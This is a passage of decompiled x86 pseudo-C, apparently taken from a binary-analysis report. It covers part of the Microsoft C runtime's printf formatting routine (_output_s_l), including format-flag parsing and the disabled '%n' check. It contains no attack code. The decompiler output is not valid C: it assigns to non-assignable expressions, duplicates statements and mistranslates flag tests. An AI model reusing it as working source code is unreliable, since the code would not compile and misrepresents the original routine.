    													if(( *(__ebp - 0x10) & 0x00000008) != 0) {
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
    														__eflags =  *(__ebp - 0x10) & 0x00000004;
    														if(( *(__ebp - 0x10) & 0x00000004) == 0) {
    															__edx = __ebp - 0x24c;
    															__eax =  *(__ebp + 8);
    															__ecx =  *(__ebp - 0x2c4);
    															__eax = E00B95E80(0x30,  *(__ebp - 0x2c4),  *(__ebp + 8), __ebp - 0x24c);
    														}
    													}
    													__eflags =  *(__ebp - 0xc);
    													if( *(__ebp - 0xc) == 0) {
    														L212:
    														__ecx = __ebp - 0x24c;
    														__edx =  *(__ebp + 8);
    														__eax =  *(__ebp - 0x24);
    														__ecx =  *(__ebp - 4);
    														__eax = E00B95EC0(__ecx, __ecx,  *(__ebp - 0x24),  *(__ebp + 8), __ebp - 0x24c);
    														goto L213;
    													} else {
    														L204:
    														__eflags =  *(__ebp - 0x24);
    														if( *(__ebp - 0x24) <= 0) {
    															goto L212;
    														}
    														L205:
    														 *(__ebp - 0x2dc) = 0;
    														__edx =  *(__ebp - 4);
    														 *(__ebp - 0x2c8) =  *(__ebp - 4);
    														__eax =  *(__ebp - 0x24);
    														 *(__ebp - 0x2cc) =  *(__ebp - 0x24);
    														while(1) {
    															L206:
    															__ecx =  *(__ebp - 0x2cc);
    															 *(__ebp - 0x2cc) =  *(__ebp - 0x2cc) - 1;
    															 *(__ebp - 0x2cc) =  *(__ebp - 0x2cc) - 1;
    															__eflags = __ecx;
    															if(__ecx == 0) {
    																break;
    															}
    															L207:
    															__eax =  *(__ebp - 0x2c8);
    															 *(__ebp - 0x32e) =  *( *(__ebp - 0x2c8));
    															__edx =  *(__ebp - 0x32e) & 0x0000ffff;
    															__eax = __ebp - 0x2d8;
    															__ecx = __ebp - 0x2d0;
    															 *(__ebp - 0x2dc) = E00B97890(__ebp - 0x2d0, __ebp - 0x2d8, 6,  *(__ebp - 0x32e) & 0x0000ffff);
    															 *(__ebp - 0x2c8) =  *(__ebp - 0x2c8) + 2;
    															 *(__ebp - 0x2c8) =  *(__ebp - 0x2c8) + 2;
    															__eflags =  *(__ebp - 0x2dc);
    															if( *(__ebp - 0x2dc) != 0) {
    																L209:
    																 *(__ebp - 0x24c) = 0xffffffff;
    																break;
    															}
    															L208:
    															__eflags =  *(__ebp - 0x2d0);
    															if( *(__ebp - 0x2d0) != 0) {
    																L210:
    																__eax = __ebp - 0x24c;
    																__ecx =  *(__ebp + 8);
    																__edx =  *(__ebp - 0x2d0);
    																__ebp - 0x2d8 = E00B95EC0( *(__ebp + 8), __ebp - 0x2d8,  *(__ebp - 0x2d0),  *(__ebp + 8), __ebp - 0x24c);
    																continue;
    															}
    															goto L209;
    														}
    														L211:
    														L213:
    														__eflags =  *(__ebp - 0x24c);
    														if( *(__ebp - 0x24c) >= 0) {
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
    															__eflags =  *(__ebp - 0x10) & 0x00000004;
    															if(( *(__ebp - 0x10) & 0x00000004) != 0) {
    																__eax = __ebp - 0x24c;
    																__ecx =  *(__ebp + 8);
    																__edx =  *(__ebp - 0x2c4);
    																__eax = E00B95E80(0x20,  *(__ebp - 0x2c4),  *(__ebp + 8), __ebp - 0x24c);
    															}
    														}
    													}
    													L216:
    													__eflags =  *(__ebp - 0x20);
    													if( *(__ebp - 0x20) != 0) {
    														 *(__ebp - 0x20) = L00B7EB20( *(__ebp - 0x20), 2);
    														 *(__ebp - 0x20) = 0;
    													}
    													while(1) {
    														L218:
    														 *(_t557 - 0x251) =  *( *(_t557 + 0xc));
    														_t547 =  *(_t557 - 0x251);
    														 *(_t557 + 0xc) =  *(_t557 + 0xc) + 1;
    														if( *(_t557 - 0x251) == 0 ||  *(_t557 - 0x24c) < 0) {
    															break;
    														} else {
    															if( *(_t557 - 0x251) < 0x20 ||  *(_t557 - 0x251) > 0x78) {
    																 *(_t557 - 0x310) = 0;
    															} else {
    																 *(_t557 - 0x310) =  *( *(_t557 - 0x251) +  &M00B77B58) & 0xf;
    															}
    														}
    														L7:
    														 *(_t557 - 0x250) =  *(_t557 - 0x310);
    														_t506 =  *(_t557 - 0x250) * 9;
    														_t536 =  *(_t557 - 0x25c);
    														_t547 = ( *(_t506 + _t536 + 0xb77b78) & 0x000000ff) >> 4;
    														 *(_t557 - 0x25c) = ( *(_t506 + _t536 + 0xb77b78) & 0x000000ff) >> 4;
    														if( *(_t557 - 0x25c) != 8) {
    															L16:
    															 *(_t557 - 0x318) =  *(_t557 - 0x25c);
    															__eflags =  *(_t557 - 0x318) - 7;
    															if( *(_t557 - 0x318) > 7) {
    																continue;
    															}
    															L17:
    															switch( *((intOrPtr*)( *(_t557 - 0x318) * 4 +  &M00B95CD0))) {
    																case 0:
    																	L18:
    																	 *(_t557 - 0xc) = 0;
    																	_t509 = E00B91090( *(_t557 - 0x251) & 0x000000ff, E00B7C680(_t557 - 0x40));
    																	_t562 = _t559 + 8;
    																	__eflags = _t509;
    																	if(_t509 == 0) {
    																		L24:
    																		E00B95DE0( *(_t557 - 0x251) & 0x000000ff,  *(_t557 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t557 + 8)), _t557 - 0x24c);
    																		_t559 = _t562 + 0xc;
    																		goto L218;
    																	} else {
    																		E00B95DE0( *((intOrPtr*)(_t557 + 8)),  *(_t557 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t557 + 8)), _t557 - 0x24c);
    																		_t562 = _t562 + 0xc;
    																		_t541 =  *( *(_t557 + 0xc));
    																		 *(_t557 - 0x251) =  *( *(_t557 + 0xc));
    																		_t547 =  *(_t557 + 0xc) + 1;
    																		__eflags = _t547;
    																		 *(_t557 + 0xc) = _t547;
    																		asm("sbb eax, eax");
    																		 *(_t557 - 0x27c) =  ~( ~( *(_t557 - 0x251)));
    																		if(_t547 == 0) {
    																			_push(L"(ch != _T(\'\\0\'))");
    																			_push(0);
    																			_push(0x486);
    																			_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																			_push(2);
    																			_t521 = L00B7D760();
    																			_t562 = _t562 + 0x14;
    																			__eflags = _t521 - 1;
    																			if(_t521 == 1) {
    																				asm("int3");
    																			}
    																		}
    																		L22:
    																		__eflags =  *(_t557 - 0x27c);
    																		if( *(_t557 - 0x27c) != 0) {
    																			goto L24;
    																		} else {
    																			 *((intOrPtr*)(L00B80C60(_t541))) = 0x16;
    																			E00B809F0(_t528, _t541, _t555, _t556, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
    																			 *(_t557 - 0x2f4) = 0xffffffff;
    																			E00B7C650(_t557 - 0x40);
    																			_t499 =  *(_t557 - 0x2f4);
    																			goto L229;
    																		}
    																	}
    																case 1:
    																	L25:
    																	 *(__ebp - 0x2c) = 0;
    																	__edx =  *(__ebp - 0x2c);
    																	 *(__ebp - 0x28) =  *(__ebp - 0x2c);
    																	__eax =  *(__ebp - 0x28);
    																	 *(__ebp - 0x18) =  *(__ebp - 0x28);
    																	__ecx =  *(__ebp - 0x18);
    																	 *(__ebp - 0x1c) = __ecx;
    																	 *(__ebp - 0x10) = 0;
    																	 *(__ebp - 0x30) = 0xffffffff;
    																	 *(__ebp - 0xc) = 0;
    																	goto L218;
    																case 2:
    																	L26:
    																	__edx =  *((char*)(__ebp - 0x251));
    																	 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
    																	 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
    																	 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
    																	__eflags =  *(__ebp - 0x31c) - 0x10;
    																	if( *(__ebp - 0x31c) > 0x10) {
    																		goto L33;
    																	}
    																	L27:
    																	__ecx =  *(__ebp - 0x31c);
    																	_t72 = __ecx + 0xb95d08; // 0x498d04
    																	__edx =  *_t72 & 0x000000ff;
    																	switch( *((intOrPtr*)(( *_t72 & 0x000000ff) * 4 +  &M00B95CF0))) {
    																		case 0:
    																			goto L30;
    																		case 1:
    																			goto L31;
    																		case 2:
    																			goto L29;
    																		case 3:
    																			goto L28;
    																		case 4:
    																			goto L32;
    																		case 5:
    																			goto L33;
    																	}
    																case 3:
    																	L34:
    																	__edx =  *((char*)(__ebp - 0x251));
    																	__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
    																	if( *((char*)(__ebp - 0x251)) != 0x2a) {
    																		__eax =  *(__ebp - 0x18);
    																		__eax =  *(__ebp - 0x18) * 0xa;
    																		__eflags = __eax;
    																		__ecx =  *((char*)(__ebp - 0x251));
    																		_t96 = __ecx - 0x30; // -48
    																		__edx = __eax + _t96;
    																		 *(__ebp - 0x18) = __eax + _t96;
    																	} else {
    																		__eax = __ebp + 0x14;
    																		 *(__ebp - 0x18) = E00B93D50(__ebp + 0x14);
    																		__eflags =  *(__ebp - 0x18);
    																		if( *(__ebp - 0x18) < 0) {
    																			__ecx =  *(__ebp - 0x10);
    																			__ecx =  *(__ebp - 0x10) | 0x00000004;
    																			__eflags = __ecx;
    																			 *(__ebp - 0x10) = __ecx;
    																			 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
    																			 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
    																		}
    																	}
    																	goto L218;
    																case 4:
    																	L40:
    																	 *(__ebp - 0x30) = 0;
    																	goto L218;
    																case 5:
    																	L41:
    																	__eax =  *((char*)(__ebp - 0x251));
    																	__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
    																	if( *((char*)(__ebp - 0x251)) != 0x2a) {
    																		__edx =  *(__ebp - 0x30);
    																		__edx =  *(__ebp - 0x30) * 0xa;
    																		__eflags = __edx;
    																		_t107 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
    																		__ecx = __edx + _t107;
    																		 *(__ebp - 0x30) = __ecx;
    																	} else {
    																		__ecx = __ebp + 0x14;
    																		 *(__ebp - 0x30) = E00B93D50(__ebp + 0x14);
    																		__eflags =  *(__ebp - 0x30);
    																		if( *(__ebp - 0x30) < 0) {
    																			 *(__ebp - 0x30) = 0xffffffff;
    																		}
    																	}
    																	goto L218;
    																case 6:
    																	L47:
    																	__edx =  *((char*)(__ebp - 0x251));
    																	 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
    																	 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
    																	 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
    																	__eflags =  *(__ebp - 0x320) - 0x2e;
    																	if( *(__ebp - 0x320) > 0x2e) {
    																		L70:
    																		goto L218;
    																	}
    																	L48:
    																	__ecx =  *(__ebp - 0x320);
    																	_t115 = __ecx + 0xb95d30; // 0x553e9003
    																	__edx =  *_t115 & 0x000000ff;
    																	switch( *((intOrPtr*)(( *_t115 & 0x000000ff) * 4 +  &M00B95D1C))) {
    																		case 0:
    																			L53:
    																			__edx =  *(__ebp + 0xc);
    																			__eax =  *( *(__ebp + 0xc));
    																			__eflags =  *( *(__ebp + 0xc)) - 0x36;
    																			if( *( *(__ebp + 0xc)) != 0x36) {
    																				L56:
    																				__edx =  *(__ebp + 0xc);
    																				__eax =  *( *(__ebp + 0xc));
    																				__eflags =  *( *(__ebp + 0xc)) - 0x33;
    																				if( *( *(__ebp + 0xc)) != 0x33) {
    																					L59:
    																					__edx =  *(__ebp + 0xc);
    																					__eax =  *( *(__ebp + 0xc));
    																					__eflags =  *( *(__ebp + 0xc)) - 0x64;
    																					if( *( *(__ebp + 0xc)) == 0x64) {
    																						L65:
    																						L67:
    																						goto L70;
    																					}
    																					L60:
    																					__ecx =  *(__ebp + 0xc);
    																					__edx =  *__ecx;
    																					__eflags =  *__ecx - 0x69;
    																					if( *__ecx == 0x69) {
    																						goto L65;
    																					}
    																					L61:
    																					__eax =  *(__ebp + 0xc);
    																					__ecx =  *( *(__ebp + 0xc));
    																					__eflags = __ecx - 0x6f;
    																					if(__ecx == 0x6f) {
    																						goto L65;
    																					}
    																					L62:
    																					__edx =  *(__ebp + 0xc);
    																					__eax =  *( *(__ebp + 0xc));
    																					__eflags =  *( *(__ebp + 0xc)) - 0x75;
    																					if( *( *(__ebp + 0xc)) == 0x75) {
    																						goto L65;
    																					}
    																					L63:
    																					__ecx =  *(__ebp + 0xc);
    																					__edx =  *__ecx;
    																					__eflags =  *__ecx - 0x78;
    																					if( *__ecx == 0x78) {
    																						goto L65;
    																					}
    																					L64:
    																					__eax =  *(__ebp + 0xc);
    																					__ecx =  *( *(__ebp + 0xc));
    																					__eflags = __ecx - 0x58;
    																					if(__ecx != 0x58) {
    																						 *(__ebp - 0x25c) = 0;
    																						goto L18;
    																					}
    																					goto L65;
    																				}
    																				L57:
    																				__ecx =  *(__ebp + 0xc);
    																				__edx =  *((char*)(__ecx + 1));
    																				__eflags =  *((char*)(__ecx + 1)) - 0x32;
    																				if( *((char*)(__ecx + 1)) != 0x32) {
    																					goto L59;
    																				} else {
    																					 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    																					 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    																					__ecx =  *(__ebp - 0x10);
    																					__ecx =  *(__ebp - 0x10) & 0xffff7fff;
    																					 *(__ebp - 0x10) = __ecx;
    																					goto L67;
    																				}
    																			}
    																			L54:
    																			__ecx =  *(__ebp + 0xc);
    																			__edx =  *((char*)(__ecx + 1));
    																			__eflags =  *((char*)(__ecx + 1)) - 0x34;
    																			if( *((char*)(__ecx + 1)) != 0x34) {
    																				goto L56;
    																			} else {
    																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    																				__ecx =  *(__ebp - 0x10);
    																				__ecx =  *(__ebp - 0x10) | 0x00008000;
    																				 *(__ebp - 0x10) = __ecx;
    																				goto L67;
    																			}
    																		case 1:
    																			L68:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    																			goto L70;
    																		case 2:
    																			L49:
    																			__eax =  *(__ebp + 0xc);
    																			__ecx =  *( *(__ebp + 0xc));
    																			__eflags = __ecx - 0x6c;
    																			if(__ecx != 0x6c) {
    																				__ecx =  *(__ebp - 0x10);
    																				__ecx =  *(__ebp - 0x10) | 0x00000010;
    																				__eflags = __ecx;
    																				 *(__ebp - 0x10) = __ecx;
    																			} else {
    																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
    																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    																			}
    																			goto L70;
    																		case 3:
    																			L69:
    																			__eax =  *(__ebp - 0x10);
    																			__eax =  *(__ebp - 0x10) | 0x00000800;
    																			__eflags = __eax;
    																			 *(__ebp - 0x10) = __eax;
    																			goto L70;
    																		case 4:
    																			goto L70;
    																	}
    																case 7:
    																	L71:
    																	__ecx =  *((char*)(__ebp - 0x251));
    																	 *(__ebp - 0x324) = __ecx;
    																	 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
    																	 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
    																	__eflags =  *(__ebp - 0x324) - 0x37;
    																	if( *(__ebp - 0x324) > 0x37) {
    																		while(1) {
    																			L190:
    																			__eflags =  *(__ebp - 0x28);
    																			if( *(__ebp - 0x28) != 0) {
    																				goto L216;
    																			}
    																			goto L191;
    																		}
    																	}
    																	L72:
    																	_t156 =  *(__ebp - 0x324) + 0xb95d9c; // 0xcccccc0d
    																	__ecx =  *_t156 & 0x000000ff;
    																	switch( *((intOrPtr*)(__ecx * 4 +  &M00B95D60))) {
    																		case 0:
    																			L123:
    																			 *(__ebp - 0x2c) = 1;
    																			__ecx =  *((char*)(__ebp - 0x251));
    																			__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
    																			__eflags = __ecx;
    																			 *((char*)(__ebp - 0x251)) = __cl;
    																			goto L124;
    																		case 1:
    																			L73:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    																			__eflags =  *(__ebp - 0x10) & 0x00000830;
    																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    																				__eax =  *(__ebp - 0x10);
    																				__eax =  *(__ebp - 0x10) | 0x00000800;
    																				__eflags = __eax;
    																				 *(__ebp - 0x10) = __eax;
    																			}
    																			goto L75;
    																		case 2:
    																			L88:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    																			__eflags =  *(__ebp - 0x10) & 0x00000830;
    																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    																				__ecx =  *(__ebp - 0x10);
    																				__ecx =  *(__ebp - 0x10) | 0x00000800;
    																				__eflags = __ecx;
    																				 *(__ebp - 0x10) = __ecx;
    																			}
    																			goto L90;
    																		case 3:
    																			L146:
    																			 *(__ebp - 0x260) = 7;
    																			goto L148;
    																		case 4:
    																			L81:
    																			__eax = __ebp + 0x14;
    																			 *(__ebp - 0x288) = E00B93D50(__ebp + 0x14);
    																			__eflags =  *(__ebp - 0x288);
    																			if( *(__ebp - 0x288) == 0) {
    																				L83:
    																				__edx =  *0xd121a0; // 0xb775a0
    																				 *(__ebp - 4) = __edx;
    																				__eax =  *(__ebp - 4);
    																				 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    																				L87:
    																				goto L190;
    																			}
    																			L82:
    																			__ecx =  *(__ebp - 0x288);
    																			__eflags =  *(__ecx + 4);
    																			if( *(__ecx + 4) != 0) {
    																				L84:
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
    																				__eflags =  *(__ebp - 0x10) & 0x00000800;
    																				if(( *(__ebp - 0x10) & 0x00000800) == 0) {
    																					 *(__ebp - 0xc) = 0;
    																					__edx =  *(__ebp - 0x288);
    																					__eax =  *(__edx + 4);
    																					 *(__ebp - 4) =  *(__edx + 4);
    																					__ecx =  *(__ebp - 0x288);
    																					__edx =  *__ecx;
    																					 *(__ebp - 0x24) =  *__ecx;
    																				} else {
    																					__edx =  *(__ebp - 0x288);
    																					__eax =  *(__edx + 4);
    																					 *(__ebp - 4) =  *(__edx + 4);
    																					__ecx =  *(__ebp - 0x288);
    																					__eax =  *__ecx;
    																					asm("cdq");
    																					 *__ecx - __edx =  *__ecx - __edx >> 1;
    																					 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
    																					 *(__ebp - 0xc) = 1;
    																				}
    																				goto L87;
    																			}
    																			goto L83;
    																		case 5:
    																			L124:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																			__eax = __ebp - 0x248;
    																			 *(__ebp - 4) = __ebp - 0x248;
    																			 *(__ebp - 0x44) = 0x200;
    																			__eflags =  *(__ebp - 0x30);
    																			if( *(__ebp - 0x30) >= 0) {
    																				L126:
    																				__eflags =  *(__ebp - 0x30);
    																				if( *(__ebp - 0x30) != 0) {
    																					L129:
    																					__eflags =  *(__ebp - 0x30) - 0x200;
    																					if( *(__ebp - 0x30) > 0x200) {
    																						 *(__ebp - 0x30) = 0x200;
    																					}
    																					L131:
    																					__eflags =  *(__ebp - 0x30) - 0xa3;
    																					if( *(__ebp - 0x30) > 0xa3) {
    																						 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
    																						 *(__ebp - 0x20) = L00B7DEA0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
    																						__eflags =  *(__ebp - 0x20);
    																						if( *(__ebp - 0x20) == 0) {
    																							 *(__ebp - 0x30) = 0xa3;
    																						} else {
    																							__eax =  *(__ebp - 0x20);
    																							 *(__ebp - 4) =  *(__ebp - 0x20);
    																							 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
    																							 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
    																						}
    																					}
    																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    																					__eax =  *(__ebp + 0x14);
    																					__ecx =  *(__eax - 8);
    																					__edx =  *(__eax - 4);
    																					 *(__ebp - 0x2a8) =  *(__eax - 8);
    																					 *(__ebp - 0x2a4) =  *(__eax - 4);
    																					__ecx = __ebp - 0x40;
    																					_push(E00B7C680(__ebp - 0x40));
    																					__eax =  *(__ebp - 0x2c);
    																					_push( *(__ebp - 0x2c));
    																					__ecx =  *(__ebp - 0x30);
    																					_push( *(__ebp - 0x30));
    																					__edx =  *((char*)(__ebp - 0x251));
    																					_push( *((char*)(__ebp - 0x251)));
    																					__eax =  *(__ebp - 0x44);
    																					_push( *(__ebp - 0x44));
    																					__ecx =  *(__ebp - 4);
    																					_push( *(__ebp - 4));
    																					__edx = __ebp - 0x2a8;
    																					_push(__ebp - 0x2a8);
    																					__eax =  *0xd12188; // 0xddc09d6c
    																					__eax =  *__eax();
    																					__esp = __esp + 0x1c;
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																					__eflags =  *(__ebp - 0x10) & 0x00000080;
    																					if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																						__eflags =  *(__ebp - 0x30);
    																						if( *(__ebp - 0x30) == 0) {
    																							__ecx = __ebp - 0x40;
    																							_push(E00B7C680(__ebp - 0x40));
    																							__edx =  *(__ebp - 4);
    																							_push( *(__ebp - 4));
    																							__eax =  *0xd12194; // 0xddc09d6c
    																							__eax =  *__eax();
    																							__esp = __esp + 8;
    																						}
    																					}
    																					__ecx =  *((char*)(__ebp - 0x251));
    																					__eflags =  *((char*)(__ebp - 0x251)) - 0x67;
    																					if( *((char*)(__ebp - 0x251)) == 0x67) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																						__eflags =  *(__ebp - 0x10) & 0x00000080;
    																						if(( *(__ebp - 0x10) & 0x00000080) == 0) {
    																							__ecx = __ebp - 0x40;
    																							_push(E00B7C680(__ebp - 0x40));
    																							__eax =  *(__ebp - 4);
    																							_push( *(__ebp - 4));
    																							__ecx =  *0xd12190; // 0xddc09d6c
    																							E00B849C0(__ecx) =  *__eax();
    																							__esp = __esp + 8;
    																						}
    																					}
    																					__edx =  *(__ebp - 4);
    																					__eax =  *( *(__ebp - 4));
    																					__eflags =  *( *(__ebp - 4)) - 0x2d;
    																					if( *( *(__ebp - 4)) == 0x2d) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																						__edx =  *(__ebp - 4);
    																						__edx =  *(__ebp - 4) + 1;
    																						__eflags = __edx;
    																						 *(__ebp - 4) = __edx;
    																					}
    																					__eax =  *(__ebp - 4);
    																					 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    																					do {
    																						L190:
    																						__eflags =  *(__ebp - 0x28);
    																						if( *(__ebp - 0x28) != 0) {
    																							goto L216;
    																						}
    																						goto L191;
    																					} while ( *(__ebp - 0x324) > 0x37);
    																					goto L72;
    																				}
    																				L127:
    																				__ecx =  *((char*)(__ebp - 0x251));
    																				__eflags = __ecx - 0x67;
    																				if(__ecx != 0x67) {
    																					goto L129;
    																				}
    																				L128:
    																				 *(__ebp - 0x30) = 1;
    																				goto L131;
    																			}
    																			L125:
    																			 *(__ebp - 0x30) = 6;
    																			goto L131;
    																		case 6:
    																			L75:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
    																			__eflags =  *(__ebp - 0x10) & 0x00000810;
    																			if(( *(__ebp - 0x10) & 0x00000810) == 0) {
    																				__ebp + 0x14 = E00B93D50(__ebp + 0x14);
    																				 *(__ebp - 0x284) = __ax;
    																				__cl =  *(__ebp - 0x284);
    																				 *(__ebp - 0x248) = __cl;
    																				 *(__ebp - 0x24) = 1;
    																			} else {
    																				 *(__ebp - 0x280) = 0;
    																				__edx = __ebp + 0x14;
    																				__eax = E00B93D90(__ebp + 0x14);
    																				 *(__ebp - 0x258) = __ax;
    																				__eax =  *(__ebp - 0x258) & 0x0000ffff;
    																				__ecx = __ebp - 0x248;
    																				__edx = __ebp - 0x24;
    																				 *(__ebp - 0x280) = E00B97890(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
    																				__eflags =  *(__ebp - 0x280);
    																				if( *(__ebp - 0x280) != 0) {
    																					 *(__ebp - 0x28) = 1;
    																				}
    																			}
    																			__edx = __ebp - 0x248;
    																			 *(__ebp - 4) = __ebp - 0x248;
    																			while(1) {
    																				L190:
    																				__eflags =  *(__ebp - 0x28);
    																				if( *(__ebp - 0x28) != 0) {
    																					goto L216;
    																				}
    																				goto L191;
    																			}
    																		case 7:
    																			L144:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																			 *(__ebp - 8) = 0xa;
    																			goto L153;
    																		case 8:
    																			L109:
    																			__ecx = __ebp + 0x14;
    																			 *(__ebp - 0x298) = E00B93D50(__ebp + 0x14);
    																			__eax = E00B97280();
    																			__eflags = __eax;
    																			if(__eax != 0) {
    																				L119:
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																				__eflags =  *(__ebp - 0x10) & 0x00000020;
    																				if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																					__edx =  *(__ebp - 0x298);
    																					__eax =  *(__ebp - 0x24c);
    																					 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
    																				} else {
    																					__eax =  *(__ebp - 0x298);
    																					 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
    																				}
    																				 *(__ebp - 0x28) = 1;
    																				while(1) {
    																					L190:
    																					__eflags =  *(__ebp - 0x28);
    																					if( *(__ebp - 0x28) != 0) {
    																						goto L216;
    																					}
    																					goto L191;
    																				}
    																			}
    																			L110:
    																			__edx = 0;
    																			__eflags = 0;
    																			if(0 == 0) {
    																				 *(__ebp - 0x32c) = 0;
    																			} else {
    																				 *(__ebp - 0x32c) = 1;
    																			}
    																			__eax =  *(__ebp - 0x32c);
    																			 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
    																			__eflags =  *(__ebp - 0x29c);
    																			if( *(__ebp - 0x29c) == 0) {
    																				_push(L"(\"\'n\' format specifier disabled\", 0)");
    																				_push(0);
    																				_push(0x695);
    																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																				_push(2);
    																				__eax = L00B7D760();
    																				__esp = __esp + 0x14;
    																				__eflags = __eax - 1;
    																				if(__eax == 1) {
    																					asm("int3");
    																				}
    																			}
    																			__eflags =  *(__ebp - 0x29c);
    																			if( *(__ebp - 0x29c) != 0) {
    																				L118:
    																				while(1) {
    																					L190:
    																					__eflags =  *(__ebp - 0x28);
    																					if( *(__ebp - 0x28) != 0) {
    																						goto L216;
    																					}
    																					goto L191;
    																				}
    																			} else {
    																				L117:
    																				 *((intOrPtr*)(L00B80C60(__ecx))) = 0x16;
    																				__eax = E00B809F0(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
    																				 *(__ebp - 0x2f8) = 0xffffffff;
    																				__ecx = __ebp - 0x40;
    																				__eax = E00B7C650(__ecx);
    																				__eax =  *(__ebp - 0x2f8);
    																				goto L229;
    																			}
    																		case 9:
    																			L151:
    																			 *(__ebp - 8) = 8;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																			__eflags =  *(__ebp - 0x10) & 0x00000080;
    																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																				__edx =  *(__ebp - 0x10);
    																				__edx =  *(__ebp - 0x10) | 0x00000200;
    																				__eflags = __edx;
    																				 *(__ebp - 0x10) = __edx;
    																			}
    																			L153:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    																			__eflags =  *(__ebp - 0x10) & 0x00008000;
    																			if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    																				__eflags =  *(__ebp - 0x10) & 0x00001000;
    																				if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																					__eflags =  *(__ebp - 0x10) & 0x00000020;
    																					if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																						__eflags =  *(__ebp - 0x10) & 0x00000040;
    																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																							__ecx = __ebp + 0x14;
    																							__eax = E00B93D50(__ebp + 0x14);
    																							__edx = 0;
    																							__eflags = 0;
    																							 *(__ebp - 0x2b8) = __eax;
    																							 *(__ebp - 0x2b4) = 0;
    																						} else {
    																							__eax = __ebp + 0x14;
    																							__eax = E00B93D50(__ebp + 0x14);
    																							asm("cdq");
    																							 *(__ebp - 0x2b8) = __eax;
    																							 *(__ebp - 0x2b4) = __edx;
    																						}
    																					} else {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																						__eflags =  *(__ebp - 0x10) & 0x00000040;
    																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
